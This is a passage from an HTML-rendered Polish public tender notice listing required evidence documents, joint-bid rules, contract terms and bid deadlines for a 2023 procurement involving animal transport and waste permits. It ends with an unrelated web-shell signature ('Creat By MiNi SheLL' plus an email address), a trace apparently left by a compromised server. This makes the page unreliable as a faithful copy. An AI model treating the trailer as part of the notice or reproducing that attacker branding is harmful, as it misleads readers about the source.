potwierdzającymi<br/>przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – według<br/>załącznika nr 7 do SWZ;<br/>b) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu określonych w rozdz. XII SWZ i ogłoszeniu:<br/>a)	zezwolenie, o którym mowa w art. 10 ust. 1 lub w art. 11 ust. 1 rozporządzenia nr 1/2005 z dnia 22 grudnia 2004 r. w sprawie ochrony zwierząt podczas transportu i związanych z tym działań oraz zmieniającym dyrektywy 64/432/EWG i 93/119/WE oraz rozporządzenie (WE) nr 1255/97 (Dz. Urz. UE L 3 z 05.01.2005, str. 1)<br/>b)	zezwolenie udzielone w formie decyzji na prowadzenie działalności o której mowa w art. 7 ust. 1 pkt 3 ustawy o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2022 r. poz. 1297 z późn. zm.),<br/>c)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ¬– według załącznika nr 5 do SWZ;<br/>d)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (Wykaz sprzętu) – zgodnie z załącznikiem nr 5a do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3)	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu – wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców.;<br/>4)	Następujące podmiotowe i przedmiotowe środki dowodowe: zgodnie z rozdz. XIV SWZ za wyjątkiem dokumentów wymaganych od oferenta z najkorzystniejszą ofertą.<br/>5)	Zobowiązanie podmiotu(ów) trzeciego(ich) – jeśli dotyczy<br/>6)	Pozostałe dokumenty wymagane ustawą oraz SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu. Oświadczenia i dokumenty potwierdzające brak podstaw wykluczenia z<br/>postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej<br/>samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) Zamawiający, zgodnie z art. 59 ustawy Pzp, żąda kopii umowy regulującej współpracę tych<br/>Wykonawców przed zawarciem umowy, b) Wykonawcy ponoszą solidarną odpowiedzialność <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wskazano we wzorze umowy - załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/844981</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-29 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com